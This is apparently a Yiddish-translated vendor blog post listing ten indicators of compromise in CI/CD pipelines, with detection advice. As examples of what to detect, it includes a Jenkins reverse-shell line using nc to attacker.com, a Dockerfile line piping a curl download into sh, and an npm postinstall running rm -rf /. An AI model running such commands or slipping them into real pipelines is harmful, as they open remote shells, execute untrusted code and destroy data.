שפּיץ 10 אינדיקאַטאָרן פון קאָמפּראָמיס אין CI/CD Pipelines

הקדמה: וואָס זענען אינדיקאַטאָרן פון קאָמפּראָמיס אין סייבערזיכערהייט?

אינדיקאַטאָרן פון קאָמפּראָמיס זענען די ערשטע ווארענונג סימנים אַז אייער סיסטעם אָדער pipeline קען זיין אונטער אטאקע. אין פשוטע ווערטער, ינדיקאַטאָרס פון קאָמפּראָמיס זענען שפּורן איבערגעלאָזט דורך אַטאַקירער, ווי מאָדנע loginס, טעקע ענדערונגען, אדער באהאלטענע מאלווער. אין IOC סייבערזיכערהייט, זיי אַקטירן ווי פינגער-אפדרוקן ביי א פארברעכן סצענע, געבענדיג דיר קלארע באווייזן אז עפעס איז נישט גוט. דעריבער, ווען דעוועלאָפּערס פרעגן וואָס זענען סימנים פון קאָמפּראָמיס, די ענטפער איז נישט באגרענעצט צו סערווערס אדער פיירוואלס, עס נעמט אויך אריין ריזיקעס באהאלטן אין מאדערנע CI/CD pipelines.

אין די pipelineס, קענען אנפאלער מאַניפּולירן קאָד, אינדזשעקטירן בייזוויליגע דעפּענדענסיעס, אדער ענדערן בויען טריט אָן ווערן באַמערקט. אָבער, רובֿ גיידס פאָקוסירן נאָך בלויז אויף סערווערס אָדער נעטוואָרקס. ווי אַ רעזולטאַט, איז די ווייכווארג צושטעל קייט געוואָרן איינער פון די גרינגסטע צילן.

דעריבער געפינען סימנים פון קאָמפּראָמיס אין CI/CD pipelineס איז וויכטיג. העכער אלעם, העלפט עס טימז בלאקירן מאַלווער, באַשיצן סודות, און זיכערן יעדן שריט פון ווייכווארג ליפערונג.

שפּיץ 10 אינדיקאַטאָרן פון קאָמפּראָמיס אין CI/CD Pipelines

ווען מען דערקלערט אינדיקאַטאָרן פון קאָמפּראָמיס, פאָקוסירן זיך רובֿ ליסטעס אויף סערווערס אדער נעטוואָרקס. אָבער אין CI/CD pipelineס, אַטאַקירער לאָזן זייער אַנדערע פינגערפּרינץ. דערקענען די סיגנאַלן איז קריטיש פֿאַר פּראָאַקטיווע פֿאַרטיידיקונג. אונטן זענען די 10 IOC סייבערזיכערהייט רויטע פֿלעגן וואָס יעדער דעוועלאָפּער און זיכערהייט אינזשעניר זאָל זיין אָפּגעהיט פֿאַר.

1. פארדעכטיקע ענדערונגען אין אפהענגיקייט

איינער פון די הויפּט סימנים פון קאָמפּראָמיס אין pipelines איז א פּלוצעמדיקע, מאָדנע אָפּהענגיקייט דערהייַנטיקונג. אַטאַקירער נוצן אָפט דעם צוטרוי וואָס דעוועלאָפּערס שטעלן אין פּאַקעט פאַרוואַלטער צו לייגן געפערלעכע פּאַקעטן.

למשל, אין npm א package.json דיפערענץ קען פלוצלינג ארייננעמען:

אזעלכע ענדערונגען קענען אויסזען זיכער אבער קענען אריינשפריצן טראָדזשאַניזירטן קאָד אין יעדן בילד.

פּראַל: קאָמפּראָמיטירטע בילדס ירשענען מאַלוואַרע ביי דער מקור.

דעטעקטיאָן: דורכפירן דעפּענדענסי רעצענזיעס, טראַק לאָקפייל דיפעראַנסיז, און סקענען נייַע פּאַקאַדזשאַז אַלע מאָל.

2. פארדעקטע קאד אין בילדס 

מאַלווער מחברים פאַרלאָזן זיך אויף פארשטויכונג צו בייפּאַסן באריכטן. אלס רעזולטאַט, דעם אינדיקאַטאָר פון קאָמפּראָמיס אין CI/CD pipelineס קען זיין איינע פון ​​די שווערסטע צו כאַפּן. אין פאַקט, פֿאַרשטעלטע פּיילאָודז גליטשן אָפט אין אָפֿן-קוואַל ביבליאָטעקן אָדער קאַנטיינער בילדער אָן באַמערקן.

פֿאַר בייַשפּיל:

  • א PyPI פּעקל וואָס ניצט base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • א דאָקער בילד פּאַקט מיט נישט נויטיקע UPX בינעריז.
  • דזשאַוואַסקריפּט פֿול מיט \x41\x42 אַנטלויפֿט באַהאַלטן קרעדענשאַל גנבים.

פּראַל: באַהאַלטענע קאָד עקסאַקיוטאַד שטילערהייט בעת בויען אָדער ראַנטיים, וואָס מאַכט דאָס אַ קריטיש סיגנאַל אין IOC סייבערזיכערהייט.
דעטעקטיאָן: פאַרבינדן SAST מיט מאַלוואַרע סקאַנינג צו מאַרקירן ענקאָודיד אָדער פּאַקט קאָד. העכער אַלץ, באַהאַנדלט אָבפוסקאַציע ווי אַ רויט פאָן וואָס פֿאַרדינט ווייטערדיקע אויספֿאָרשונג.

3. סודות אויפגעדעקט אין גיט: א קלאסישע IOC סייבערזיכערהייט ריזיקע

CI/CD pipelineירשענען אָפט סודות גלייך פֿון רעפּאָזיטאָריעס. אָבער, ווען סודות דערשייַנען אין גיט, ווערן זיי איינע פון ​​די קלארסטע ענטפֿערס צו דער פֿראַגע "וואָס זענען אינדיקאַטאָרן פֿון קאָמפּראָמיס אין pipelineס?" אזוי שנעל ווי די קרעדענשעלס לאנדן אין גיט, קענען אנפאלער זיי אויסניצן אויף אומבאגרענצטע צייט.

פֿאַר בייַשפּיל:

  • A .env טעקע מיט AWS_SECRET_KEY=.
  • טאָקענס אַרײַנגעשטופּט config.json.
  • סודות נאָך קענטיק אין גיט געשיכטע אפילו נאָך באַזייַטיקונג.

פּראַל: אויפגעדעקטע שליסלען געבן אנפאלער דירעקטן צוטריט צו CI/CD pipelineס, וואָלקן סיסטעמען, אדער דאַטאַבייסעס. דאָס איז דעריבער איינער פון די מערסט געפערלעכע אינדיקאַטאָרן פון קאָמפּראָמיס.
דעטעקטיאָן: נוצן pre-commit hooks און CI דזשאבס פאר געהיימע סקענירן, און אפנעמען ארויסגעליקטע שליסלען גלייך. דערצו, דורכפירן אויטאמאטישע רעמעדיאציע צו רעדוצירן אויסשטעלונג פענצטער.

4. געטוישט Pipeline קאָנפיגוראַציעס: באַהאַלטענע אינדיקאַטאָרן פון קאָמפּראָמיס

Pipeline קאָנפיגס זענען הויך-ווערט צילן ווייַל איין איינציקע מאדיפיקאציע כאַפּט אָפט דעם גאַנצן וואָרקפלאָודערפֿאַר, געטאַמפּערט pipeline טעקעס זענען א הויפט IOC סייבערזיכערהייט ריזיקע וואס טראדיציאנעלע מאָניטאָרינג מכשירים דעטעקטירן זעלטן.

פֿאַר בייַשפּיל:

  • אין גיטהאב אקציעס:

  • אין גיטלאַב: אַ בייזוויליקע אַרבעט צוגעגעבן צו .gitlab-ci.yml וואָס וואַרפט אַוועק סענסיטיווע דאַטן.
  • אין דזשענקינס: sh "nc -e /bin/bash attacker.com 4444".

פּראַל: די נישט באשטעטיגטע ענדערונגען דרייען אייער pipeline אין אַ שטענדיקע הינטערטיר פֿאַר אַטאַקערס, וואָס קלאָר ציילט זיך ווי אַן אָנצייגער פֿון קאָמפּראָמיס.
דעטעקטיאָן: דורכפירן אונטערגעשריבענע קאנפיגוראציעס, פארלאנגען PR באשטעטיגונגען, און מאניטארירן פאר אומגעריכטע דזשאבס. דערצו, שטעלן guardrails וואָס אויטאָמאַטיש בלאָקירן געביטן וואָרקפלאָוז.

5. פּריווילעדזשד IaC דיפאָלץ 

פאַלש קאָנפיגורירטע אינפראַסטרוקטור דעפֿיניציעס שאַפֿן אָפֿט פֿאַרבאָרגענע באַקטירן. אַלס רעזולטאַט, פּריווילעגירטע דיפאָלץ אין IaC זענען אַ קלאַסישע IOC סייבערזיכערהייט ריזיקע.

פֿאַר בייַשפּיל:

  • א קובערנעטעס דיפּלוימאַנט גראַנטינג פּאָדס privileged: true.
  • העלם טשאַרץ וואָס ווײַזן סערוויסעס מיט 0.0.0.0:22.

פּראַל: אַטאַקירער באַקומען רוט-לעוועל אַקסעס אָדער עפֿענען אינערלעכע באַדינונגען עפֿנטלעך. דערפֿאַר, פֿאַרברייטערן די פּראָבלעמען די אַטאַק-פֿלאַך באַדייטנד.
דעטעקטיאָן: צולייגן IaC סקענען צו דורכפירן די מינדסטע פריווילעגיע איידער צונויפגיסן. דערצו, זיכער מאכן אז יעדע קאנפיגוראציע ווערט איבערגעקוקט אלס טייל פון די pipeline.

6. אומגעוויינטלעכע בויען אויפפירונגען 

אַטאַקירער טוישן זיך אָפט pipeline נאַטור צו גליטשן אין בייזוויליקע אַקציעס. מיט אַנדערע ווערטער, ומגעוויינטלעכע בויען טעטיקייט איז איינע פון ​​די קלאָרסטע ענטפֿערס צו וואָס זענען אינדיקאַטאָרן פון קאָמפּראָמיס אין CI/CD pipelines.

פֿאַר בייַשפּיל:

  • בוידז מאכן ארויסגייענדיקע נעץ פארלאנגען צו פרעמדע דאמעינען.
  • א Node.js פראיעקט וואס האט פלוצלינג ארויסגעגעבן PowerShell בעת npm install.
  • א CI דזשאב וואס דאונלאודט גרויסע ביינעריס נישט דעפינירט אין בילד סקריפטס.

פּראַל: קאָמפּראָמיטירטע בילדס קענען דינען ווי מאַלוואַרע פאַרשפּרייטונג פונקטן. העכער אַלץ, זיי פאַרשפּרייטן בייזע פּיילאָודז אַריבער יעדער דיפּלוימאַנט.
דעטעקטיאָן: מאָניטאָרירן בויען לאָגס פֿאַר אומגעריכטע פּראָצעסן אָדער פֿאַרבינדונגען. דערצו, קאָנפיגורירן אַנאַמאַלי דעטעקשאַן צו מאַרקירן ביכייוויערז אַרויס פון די נאָרמע.

7. בייזוויליקע פּעקל סקריפּטן ווי IOC סייבערזיכערהייט ריזיקעס

פּעקל מאַנאַדזשערז שטיצן לעבן-ציקל hooks וואָס אַטאַקערס נוצן אויס. דעריבער, בייזע סקריפּטן אין npm, PyPI, אדער Dockerfiles זענען שטאַרקע סימנים פון קאָמפּראָמיס.

פֿאַר בייַשפּיל:

  • npm: postinstall סקריפּט לויפט rm -rf / אדער בעאַקאָנינג צו אַ C2.
  • פּיפּי: setup.py אויספירן באהאלטענע פּיטהאָן קאָד ביים אינסטאַלירן.
  • דאָקערפייל: RUN curl attacker.sh | sh.

פּראַל: די אטאקע ווערט אויסגעפירט בעת די אינסטאַלאַציע, איידער קיין שום ראַנטיים טעסטינג. דערפֿאַר קען עס זײַן אַז דעוועלאָפּערס באַמערקן עס קיינמאָל נישט ביז עס איז צו שפּעט.
דעטעקטיאָן: סקענט פּעקל מאַניפעסטן פֿאַר אינסטאַלירן סקריפּטן. אין דערצו, באַגרענעצן ריזיקאַלישע hooks in CI/CD דזשאָבס צו רעדוצירן ויסשטעלן.

8. רעגיסטרי פאר'גיפטונג אינדיקאטארן פון קאמפראמיס

אַטאַקערס פאַרבייטן אָדער מאָדיפיצירן אַרטיפאַקץ אין רעגיסטריז, און די געשעענישן זענען לערנבוך ביישפילן פון וואָס זענען ינדיקאַטאָרן פון קאָמפּראָמיס אין סאַפּליי קייט. pipelines.

פֿאַר בייַשפּיל:

  • א דאָקער בילד טאַג שטילערהייט דערהייַנטיקט מיט אַ טראָדזשאַניזירט שיכט.
  • אן אינערליכע פעקל איז ערזעצט געווארן מיט א פאר'סמ'טע ווערסיע.
  • npm נעמספעיס סקוואטינג, ווי צום ביישפּיל lodash-proxy.

פּראַל: יעדער בילד וואָס ניצט דעם רעגיסטרי אַרטיפאַקט ווערט קאָמפּראָמיטירט. נישט נאָר דאָס, נאָר דער קאָמפּראָמיס פֿאַרשפּרייט זיך צו דאַונסטרים סערוויסעס.
דעטעקטיאָן: דורכפירן אונטערשריפט און אָרנטלעכקייט טשעקס אויף אַלע רעגיסטרי פּולז. אין דערצו, טראַק אַרטיפאַקט אָפּשטאַם מיט SBOM באשטעטיגען.

9. אומגעוויינטלעכע באַניצער טעטיקייט ווי IOC באַווייַז

קאָמפּראָמיטירטע אַקאַונטס לאָזן כּמעט שטענדיק הינטער זיך אומנאָרמאַלע שפּורן. דעריבער, איז אומגעווענליכע דעוועלאָפּער נאַטור אַ שטאַרקער אָנצייגונג פון קאָמפּראָמיס.

פֿאַר בייַשפּיל:

  • Commitס געשטופט ביי 3 אזייגער אינדערפרי לאקאלע צייט.
  • פּי-אַר באַשטעטיקונגען דורך אַקאַונטס אויף וואַקאַציע.
  • Pipelineס אויסגעלאָשן מיט אַן אומגעוויינטלעכער אָפטקייט.

פּראַל: אַטאַקירער נוצן גע'גנב'עטע קרעדענצן צו אַריינשטעלן בייזוויליגע ענדערונגען. נאָך אַלץ, נישט-אָטעריזירטע commitס'מישן זיך גרינג אריין אין נארמאלע ארבעטס-פלוסן.
דעטעקטיאָן: מאָניטאָר SCM טעטיקייט פֿאַר אַנאָמאַליעס, דורכפירן MFA, און ראָטירן טאָקענס רעגולער. אין דערצו, אַלערט אויף סאַספּישאַס commit אדער הסכמה מוסטערן.

10. דורכגעפאלענע אינטעגריטעט אדער אונטערשריפט טשעקס אין IOC סייבערזיכערהייט

א געוויינטלעכע אבער איגנארירטע גראדן פון קאָמפּראָמיס איז אַ דורכגעפאַלענע אינטעגריטעט אָדער אונטערשריפט קאָנטראָל. אין IOC סייבערזיכערהייט, וועריפיצירן די קאָנטראָלן אַז קאָד אָדער אַרטיפאַקץ זענען עכט. אויב מען לאָזט זיי איבער, בלייבט עס pipelineס יקספּאָוזד.

ביישפילן:

  • א SHA256 העש שטימט נישט מיט דער ערווארטעטער טשעקסום.
  • א פעלנדיקע אדער אומגילטיקע GPG אונטערשריפט.
  • An SBOM ווײַזנדיק נישט-אונטערגעשריבענע אַרטיפאַקץ.

פּראַל: אָרנטלעכקייט דורכפאַלן מיינען אָפט טאַמפּערינג, רעגיסטרי פאַרסאַמונג, אָדער מאַלוואַרע ינדזשעקשאַן.

דעטעקטיאָן: אויטאמאטיזירן אונטערשריפט טשעקס, דורכפירן טשעקסום וואַלידאַציע, און בלאָקירן נישט-אונטערגעשריבענע קאָמפּאָנענטן. העכער אַלץ, באַהאַנדלט יעדן דורכגעפאַלענעם טשעק ווי קלאָרע באַווייַז פון קאָמפּראָמיס.

CI/CD אינדיקאַטאָרן פון קאָמפּראָמיס אויף אַ בליק

אינדיקאַטאָר פון קאָמפּראָמיס (IOC) אימפּאַקט אין CI/CD Pipelines ווי צו דעטעקט
פארדעכטיקע אפהענגיקייט ענדערונגען אַטאַקערס אַריינשטעלן בייזע ביבליאָטעקן אין פּעקל פאַרוואַלטער, וואָס פירט צו קאָמפּראָמיטירטע בילדס. טראַק לאָקפייל דיפערענצן, דורכפירן דעפּענדענסי רעצענזיעס, און סקענען דעפּענדענסיעס קאַנטיניואַסלי.
פארדעקטע קאוד אין בילדס באַהאַלטענע פּיילאָודז עקסאַקיוטאַד בעשאַס בילדז אָדער ראַנטיים אָן דעטעקשאַן. נוצן SAST און מאַלוואַרע סקאַנינג צו מאַרקירן base64, hex, אָדער פּאַקט קאָד פּאַטערנז.
סודות אויפדעקט אין גיט ארויסגעליקטע טאָקענס אדער API שליסלען געבן אַטאַקערס דירעקטן צוטריט צו קריטישע סיסטעמען. לויפן געהיימע סקענס אין גיט hooks און אויטאָמאַטיש אָפּרופן די ליקטע קרעדענשעלס.
געטוישט Pipeline קאַנפיגיעריישאַנז מאָדיפיצירטע וואָרקפלאָוז לאָזן דאַטן עקספילטראַציע אָדער פּערסיסטאַנס אינעווייניק CI/CD. פארלאנגען PR באשטעטיגונגען, דורכפירן אונטערגעשריבענע קאנפיגוראציעס, און מאניטארירן pipeline ענדערונגען.
זוכה IaC דיפאָלץ צו דערלויבנדיקע ראָלעס אָדער נישט-זיכערע דיפאָלטס אַנטדעקן וואָלקן סביבות. סקענען טעראַפאָרם, קובערנעטעס, און העלם טעקעס פֿאַר די מינדסטע פּריווילעגיע דורכפֿירונג.
אומגעוויינטלעכע בויען אויפפירונגען Pipelineס געניצט ווי מאַלוואַרע פאַרשפּרייטונג פונקטן אָדער פֿאַר לאַטעראַל באַוועגונג. אנאליזירן בויען לאגס פאר אומגעריכטע דאונלאודס, פראצעסן, אדער ארויסגייענדיקע רופן.
בייזוויליקע פּעקל סקריפּטן באַהאַלטענע פאַר/נאָך-אינסטאַלירן סקריפּטן אַקטיוויירן פּיילאָודז איידער ראַנטיים טעסטינג. בלאקירן ריזיקאלישע npm/PyPI סקריפטן און באגרענעצן אויספירונג אין CI/CD דזשאָבס.
רעגיסטרי פארגיפטונג טראָדזשאַניזירטע אַרטיפאַקץ פאַרבייַטן טראַסטיד בילדער אָדער ביינעריז אין רעגיסטריז. וועריפיצירן טשעקסומס, דורכפירן אונטערשריפט וואַלידאַציע, און סקענען רעגיסטריז פּראָאַקטיוולי.
אומגעוויינטלעכע באַניצער טעטיקייט קאָמפּראָמיטירטע אַקאַונטס שטופּן בייזוויליקע commitס אדער טריגער pipelines. דורכפירן MFA, מאָניטאָרירן commitס פֿאַר אַנאַמאַליעס, און אַנאַליזירן login patterns.
דורכגעפאלענע אָרנטלעכקייט אָדער אונטערשריפט טשעקס ווײַזט אויף געטוישטן קאָד, אָפּהענגיקייטן, אָדער בילדער וואָס קומען אַרײַן אין pipeline. אויטאמאטיזירן אינטעגריטעט טשעקס און בלאקירן אומגעחתמעטע אדער נישט-פאסיגע קאמפאנענטן.

פארוואס טראדיציאנעלע IOC סייבערזיכערהייט פעלט CI/CD ריסקס

רובֿ אָרגאַניזאַציעס מאָניטאָרירן שוין אינדיקאַטאָרן פון קאָמפּראָמיט אויף סערווערס, קאָמפּיוטערס אָדער נעטוואָרקס. אָבער, דער קלאַסישער צוגאַנג צו IOC סייבערזיכערהייט איגנאָרירט... CI/CD pipelineס, וואָס זענען איצט איינע פון ​​די מערסט קריטישע אַטאַק סערפאַסיז. אין פאַקט, pipelineס ווײַזן אײַנציקאַרטיקע קאָמפּראָמיס סיגנאַלן וואָס טראדיציאָנעלע מכשירים קענען נישט דעטעקטירן.

אינדיקאַטאָרן פון קאָמפּראָמיס אין טראַדיציאָנעלער זיכערהייט

אין קאַנווענשאַנעלער IOC סייבערזיכערהייט, איז דער פאָקוס געוויינטלעך אויף:

  • ומגעוויינטלעך loginס אדער IP אדרעסן וואָס פֿאָרשלאָגן געגנבעטע קרעדענשעלס.
  • פארדעכטיקע טעקע העשיז אדער רעגיסטרי ענדערונגען וואָס אַנטפּלעקן מאַלוואַרע.
  • אומגעריכטער ארויסגייענדיקער טראַפיק וואָס ווײַזט אויף דאַטן עקספילטראַציע.

דאָס זענען באַקאַנטע אינדיקאַטאָרן וואָס ווערן אויך נאָכגעפֿאָלגט אין די MITER ATT&CK פריימווערק, וואָס מאַפּט געוויינטלעכע קעגנערשע נאַטורן און טאַקטיקן. דאָס זענען נוצלעכע סיגנאַלן. אָבער, זיי אַפּליקירן דער הויפּט צו אָפּערירן סיסטעמען אָדער קאָרפּאָראַטיווע נעטוואָרקס. דער רעזולטאַט איז, אַז זיי פאַרפעלן די סאַטאַלע מאַניפּולאַציע וואָס פּאַסירט פריער אין דער ווייכווארג צושטעל קייט.

פאַר וואָס CI/CD Pipelineס זענען אַנדערש

CI/CD pipelineס זענען אויטאָמאַטישע סביבות וואו דעוועלאָפּערס commit קאָד, פּול דעפּענדענסיעס, און ריליס בילדס. אַטאַקערז וויסן אַז איין קאָמפּראָמיס דאָ קאַסקאַדירט אַריבער יעדער דיפּלוימאַנט. אַקאָרדינגלי, וואָס זענען ינדיקאַטאָרן פון קאָמפּראָמיס אין CI/CD pipelineזיי זעען אויס זייער אַנדערש:

  • א בייזוויליקע דעפּענדענסי שטילערהייט צוגעגעבן צו package.json אדער requirements.txt.
  • API שליסלען אדער טאָקענס אויסגעשטעלט אין גיט commits אדער .env טעקעס.
  • פארשטעקטע קאד איינגעשפריצט ​​אין npm אדער PyPI פעקלעך.
  • טעראַפאָרם אדער קובערנעטעס טעקעס מיט נישט-זיכערע דיפאָלטס ווי פּריווילעגירט: אמת.
  • Pipeline דזשאַבס רעדאַקטירט צו עקספילטרירן דאַטן אָדער עפענען באַקטירן.

די קאָמפּראָמיס סיגנאַלן אין CI/CD בלייבן אומזעיקבאר צו standard זיכערהייט מכשירים.

דער ריס אין IOC סייבערזיכערהייט

כאָטש פילע טימז פֿאַרשטייען דעם ווערט פֿון אינדיקאַטאָרן פֿון קאָמפּראָמיס, פֿאַרלאָזן זיי זיך נאָך בלויז אויף דעטעקציע פֿון סערווערס און נעץ לאָגס. דעריבער קענען אַטאַקירער פֿאַרגיפֿטן בילדס אָדער אַרײַנשטעלן מאַלווער אָן לאָזן די געוויינטלעכע שפּורן. דאָס איז פאַרוואָס אינצידענטן ווי די XZ Utils באַקדאָר אָדער בייזוויליגע npm פּאַקאַדזשאַז זענען געבליבן אומדעטעקט ביז זיי האָבן דערגרייכט פּראָדוקציע.

די סארטן צושטעל-קייט קאמפראמיסן ווערן אויך ארויסגעוויזן דורך CISא'ס סופּליי טשיין זיכערהייט גיידאַנס, וואָס וואָרנט אַז אַטאַקירער צילן מער און מער CI/CD pipelineס און רעגיסטריז.

די טאַקעאַווייַ

טראדיציאנעלע IOC סייבערזיכערהייט איז נויטיק אבער נישט גענוג. העכער אלעם, מוזן טימז דערקענען אינדיקאטארן פון קאמפראמיס ספעציפיש צו CI/CD pipelineס. נאָר דעמאָלט קענען זיי דעטעקטירן בייזוויליקע קאָד אָדער pipeline זידלען איידער עס פארשפרייט זיך איבער סביבות.

סקאַ-טולס-סאָפֿטווער-קאָמפּאָזיציע-אַנאַליז-טולס
פּריאָריטיזירן, פאַרריכטן און זיכערן אייערע ווייכווארג ריזיקעס
באַקומען דיין פריי חשבון.
קיין קרעדיט קאַרטל פארלאנגט.

זיכערן אייער ווייכווארג אנטוויקלונג און ליפערונג

מיט Xygeni פּראָדוקט סוויט